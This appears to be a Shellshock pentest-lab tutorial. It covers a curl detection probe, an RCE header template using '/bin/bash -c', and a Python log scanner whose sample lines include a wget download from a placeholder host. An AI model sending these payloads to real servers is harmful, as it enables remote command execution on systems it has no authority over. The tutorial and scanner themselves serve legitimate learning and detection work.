Shellshock.
Shellshock Tutorial; Detection and Exploitation...
Shellshock is a security vulnerability in the Bash shell, disclosed in 2014, that allows attackers to execute arbitrary commands on a vulnerable system. It abuses the way Bash imports function definitions from environment variables: a vulnerable Bash keeps parsing past the end of the function body, so any command appended after it is executed. By injecting such a definition into an environment variable (for example through an HTTP header that a CGI script passes to the environment), an attacker can run commands, gain control of the system, or bypass security restrictions, which makes it a serious risk for servers and devices running vulnerable versions of Bash.
The following examples can be reproduced in this lab: PentesterLab CVE-2014-6271/Shellshock
Detection.
Shellshock is commonly exploited through .sh or .cgi files exposed by a web server (typically under /cgi-bin/), so those extensions are worth adding to the wordlist when fuzzing.
Shellshock payloads always begin with:
() { :;};
curl.
Once we suspect this vulnerability, we can send the following curl request to the server and check whether the output of the injected echo comes back in the response. If it does, we are facing a Shellshock vulnerability. The first echo prints the blank line that ends the HTTP headers, so the text from the second echo lands in the response body.
curl -H 'User-Agent: () { :;}; echo; echo ¿Es vulnerable?' 'http://10.10.10.56/cgi-bin/user.sh'
We can use Burpsuite too.
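From the defender's side, the same `() {` prefix is the signature to hunt for in web server logs. As an added example (not from the original post), the following Python scanner flags combined-format log lines whose Referer or User-Agent carries a Shellshock function definition aimed at a CGI script and extracts the trailing command; the log lines, addresses and paths are constructed.

```python
import re

# Trigger of CVE-2014-6271: a Bash function definition "() { ...; }" delivered
# through an environment variable (here, an HTTP header the CGI layer copies
# into the environment). Vulnerable Bash parses the definition and keeps
# executing whatever follows the closing brace; a patched Bash stops there.
# Whitespace inside "() {" is tolerated because it varies between probes.
SHELLSHOCK_RE = re.compile(r"\(\s*\)\s*\{(?P<body>[^}]*)\}\s*;?\s*(?P<trailer>.*)")

# Apache/nginx "combined" log format. Only Referer and User-Agent are logged by
# default; payloads placed in other headers need full header capture to be seen.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$'
)

def find_shellshock(value):
    """Return the trailing command text if `value` carries a Shellshock
    function definition, else None."""
    m = SHELLSHOCK_RE.search(value)
    return m.group("trailer").strip() if m else None

def scan_log(lines):
    """Return (ip, request, field, trailer) for each log line whose
    Referer, User-Agent or request line carries the pattern."""
    hits = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # not combined format; skip rather than guess
        for field in ("referer", "ua", "request"):
            trailer = find_shellshock(m.group(field))
            if trailer is not None:
                hits.append((m.group("ip"), m.group("request"), field, trailer))
                break
    return hits

# Constructed sample lines (addresses, timestamps and paths are made up).
SAMPLE_LOG = [
    '10.10.14.5 - - [24/Sep/2014:12:00:01 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 512 "-" "() { :;}; echo; echo vulnerable"',
    '10.10.14.5 - - [24/Sep/2014:12:00:02 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 512 "-" "() { :;}; /bin/bash -c \'id\'"',
    '10.10.14.9 - - [24/Sep/2014:12:00:03 +0000] "GET /index.html HTTP/1.1" 200 2048 "-" "Mozilla/5.0 (X11; Linux x86_64)"',
    '10.10.14.9 - - [24/Sep/2014:12:00:04 +0000] "GET /cgi-bin/user.sh HTTP/1.1" 200 512 "() {:;}; /usr/bin/wget http://example.invalid/x" "curl/7.38.0"',
]

if __name__ == "__main__":
    for ip, request, field, trailer in scan_log(SAMPLE_LOG):
        print(f"{ip} {request!r} via {field}: {trailer}")
```

Requests to /cgi-bin/ paths from a host whose User-Agent or Referer matches are the ones to correlate with the patch status of Bash on that server.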
RCE.
Once we know we are facing Shellshock we can try to execute commands on the target. To do so we place our command in the header as follows (full paths are used because the CGI environment usually has a minimal PATH):
User-Agent: () { :;}; /bin/bash -c "<COMMAND>"
Example commands demonstrated in the original post (shown as images): ping, wget.
Reverse Shell.
Any header of the request can be used to deliver the payload, as the following pictures show: